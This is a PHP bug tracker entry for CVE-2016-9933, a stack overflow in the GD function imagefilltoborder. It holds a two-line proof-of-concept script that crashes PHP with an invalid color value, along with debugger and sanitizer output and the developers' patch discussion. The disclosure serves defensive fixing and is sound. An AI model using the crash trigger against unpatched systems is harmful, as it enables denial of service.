php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72696 imagefilltoborder stackoverflow on truecolor images
Submitted: 2016-07-28 06:11 UTC Modified: 2016-12-13 11:50 UTC
From: fernando at null-life dot com Assigned: cmb
Status: Closed Package: GD related
PHP Version: 5.6.27 OS: *
Private report: No CVE-ID: 2016-9933
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: fernando at null-life dot com
New email:
PHP Version: OS:

 

 [2016-07-28 06:11 UTC] fernando at null-life dot com
Description:
------------
Description:
------------
Invalid color causes stack exhaustion by recursive call to function gdImageFillToBorder when the image used is truecolor. This was tested on a 64 bits platform.

This is not the same as bug #72350 but they are related.


GDB output
----------

gdb -q --args /home/operac/php-70-sinasan/sapi/cli/php -n poc.php
Reading symbols from /home/operac/php-70-sinasan/sapi/cli/php...done.
(gdb) b gd.c:1851
Breakpoint 1 at 0x54a354: gd.c:1851. (2 locations)
(gdb) b gd.c:1834
Breakpoint 2 at 0x54a287: gd.c:1834. (2 locations)
(gdb) r
Starting program: /home/operac/php-70-sinasan/sapi/cli/php -n poc.php


Breakpoint 1, php_gd_gdImageFillToBorder (im=0x7ffff2c77000, x=0, y=0, border=1, color=-2) at /home/operac/php-70-sinasan/ext/gd/libgd/gd.c:1851
1851                                            gdImageFillToBorder(im, i, y + 1, border, color);
(gdb) c
Continuing.

Breakpoint 2, php_gd_gdImageFillToBorder (im=0x7ffff2c77000, x=0, y=1, border=1, color=-2) at /home/operac/php-70-sinasan/ext/gd/libgd/gd.c:1834
1834                                            gdImageFillToBorder(im, i, y - 1, border, color);
(gdb) c
Continuing.

Breakpoint 1, php_gd_gdImageFillToBorder (im=0x7ffff2c77000, x=0, y=0, border=1, color=-2) at /home/operac/php-70-sinasan/ext/gd/libgd/gd.c:1851
1851                                            gdImageFillToBorder(im, i, y + 1, border, color);
(gdb) c
Continuing.

Breakpoint 2, php_gd_gdImageFillToBorder (im=0x7ffff2c77000, x=0, y=1, border=1, color=-2) at /home/operac/php-70-sinasan/ext/gd/libgd/gd.c:1834
1834                                            gdImageFillToBorder(im, i, y - 1, border, color);
(gdb) p/x color
$1 = 0xfffffffe

Test script:
---------------
<?php

$imgs = imagecreatetruecolor(10, 10);
imagefilltoborder($imgs, 0, 0, 1, 9223372036854775806);

Expected result:
----------------
No crash

Actual result:
--------------
operac@hp2:~/crashes/067b65f5-filltoborder$ sh run.sh 

ASAN:SIGSEGV
=================================================================
==5658==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd7b0bdf98 (pc 0x000000991208 bp 0x7ffd7b0be0e0 sp 0x7ffd7b0bdf98 T0)
    #0 0x991207 in php_gd_gdImageSetPixel /home/operac/php-70/ext/gd/libgd/gd.c:728
    #1 0x99cb00 in php_gd_gdImageFillToBorder /home/operac/php-70/ext/gd/libgd/gd.c:1810
    #2 0x99d752 in php_gd_gdImageFillToBorder /home/operac/php-70/ext/gd/libgd/gd.c:1834
    #3 0x99dbfa in php_gd_gdImageFillToBorder /home/operac/php-70/ext/gd/libgd/gd.c:1851
    #4 0x99d752 in php_gd_gdImageFillToBorder /home/operac/php-70/ext/gd/libgd/gd.c:1834
    #5 0x99dbfa in php_gd_gdImageFillToBorder /home/operac/php-70/ext/gd/libgd/gd.c:1851
    #6 0x99d752 in php_gd_gdImageFillToBorder /home/operac/php-70/ext/gd/libgd/gd.c:1834
    #7 0x99dbfa in php_gd_gdImageFillToBorder /home/operac/php-70/ext/gd/libgd/gd.c:1851
    #8 0x99d752 in php_gd_gdImageFillToBorder /home/operac/php-70/ext/gd/libgd/gd.c:1834


Patches

fix-72696 (last revision 2016-10-25 11:26 UTC) by cmb@php.net)

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-08-10 06:45 UTC] stas@php.net
-Assigned To: +Assigned To: pajoye
 [2016-08-10 06:45 UTC] stas@php.net
Looks like bug in libgd, negative colors are not set but border fill relies on them to be set. Pierre, could you please take a look?
 [2016-08-15 06:03 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-10-25 01:41 UTC] stas@php.net
-Assigned To: pajoye +Assigned To: cmb
 [2016-10-25 11:26 UTC] cmb@php.net
The following patch has been added/updated:

Patch Name: fix-72696
Revision:   1477394767
URL:        https://bugs.php.net/patch-display.php?bug=72696&patch=fix-72696&revision=1477394767
 [2016-10-25 11:26 UTC] cmb@php.net
Indeed, filling with negative color values will not necessarily
work. For example, color -2 means gdStyled, and if no style is
set, no pixel will be drawn[1]. However, even if a style has been
set, the color that will be drawn is not necessarily the color
that gdImageFillToBorder() expects to be drawn.

Anyhow, this issue has already been fixed in libgd 2.2.3[2], where
it doesn't have been recognized as security issue, so I'm not sure
whether it should be regarded as security issue for PHP, or rather
as a programmer error.

Either way, the attached patch solves the issue and should be
applied against PHP 5.6+.

[1] <https://github.com/php/php-src/blob/PHP-7.0.12/ext/gd/libgd/gd.c#L729-L732>
[2] <https://github.com/libgd/libgd/commit/77f619d48259383628c3ec4654b1ad578e9eb40e>
 [2016-10-30 21:32 UTC] stas@php.net
-PHP Version: 7.0.9 +PHP Version: 5.6.27
 [2016-10-30 21:32 UTC] stas@php.net
The fix is in security repo as 863d37ea66d5c960db08d6f4a2cbd2518f0f80d1 and in https://gist.github.com/a3b8821719ca7d6e5386d735f4635cf1

please verify
 [2016-12-12 12:32 UTC] kaplan@php.net
Fixed upstream in libgd 2.2.2, see https://libgd.github.io/release-2.2.2.html
 [2016-12-12 12:36 UTC] kaplan@php.net
-Status: Assigned +Status: Closed
 [2016-12-12 12:48 UTC] cmb@php.net
-Status: Closed +Status: Re-Opened
 [2016-12-12 12:48 UTC] cmb@php.net
> Fixed upstream in libgd 2.2.2, see https://libgd.github.io/release-2.2.2.html

That is a closely related issue, but not the same as this ticket is about. CVE-2015-8874 has been reported for libgd[1] and PHP[2] and is resolved.

The fix for this issue has been released with libgd 2.2.3[3] (without CVE), but apparently it is not yet fixed in PHP's bundled libgd.

[1] <https://github.com/libgd/libgd/issues/213>
[2] <https://bugs.php.net/bug.php?id=72350>
[3] <https://github.com/libgd/libgd/commit/77f619d48259383628c3ec4654b1ad578e9eb40e>
 [2016-12-12 13:43 UTC] kaplan@php.net
The patch you've mentioned as not applied in PHP is already done for PHP 5.6.28 at https://github.com/php/php-src/commit/863d37ea66d5c960db08d6f4a2cbd2518f0f80d1 (with an older part applied in https://github.com/php/php-src/commit/6d3fa654b702c8762aa80ab795080f5c4464d677 earlier this year).
 [2016-12-12 13:49 UTC] cmb@php.net
-Status: Re-Opened +Status: Closed
 [2016-12-12 13:49 UTC] cmb@php.net
Indeed, you're right. Thanks!
 [2016-12-13 11:50 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-9933
 [2016-12-13 11:50 UTC] kaplan@php.net
Use CVE-2016-9933. The scope of this CVE is only the missing "color < 0" test in older versions.
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Thu May 25 16:01:43 2017 UTC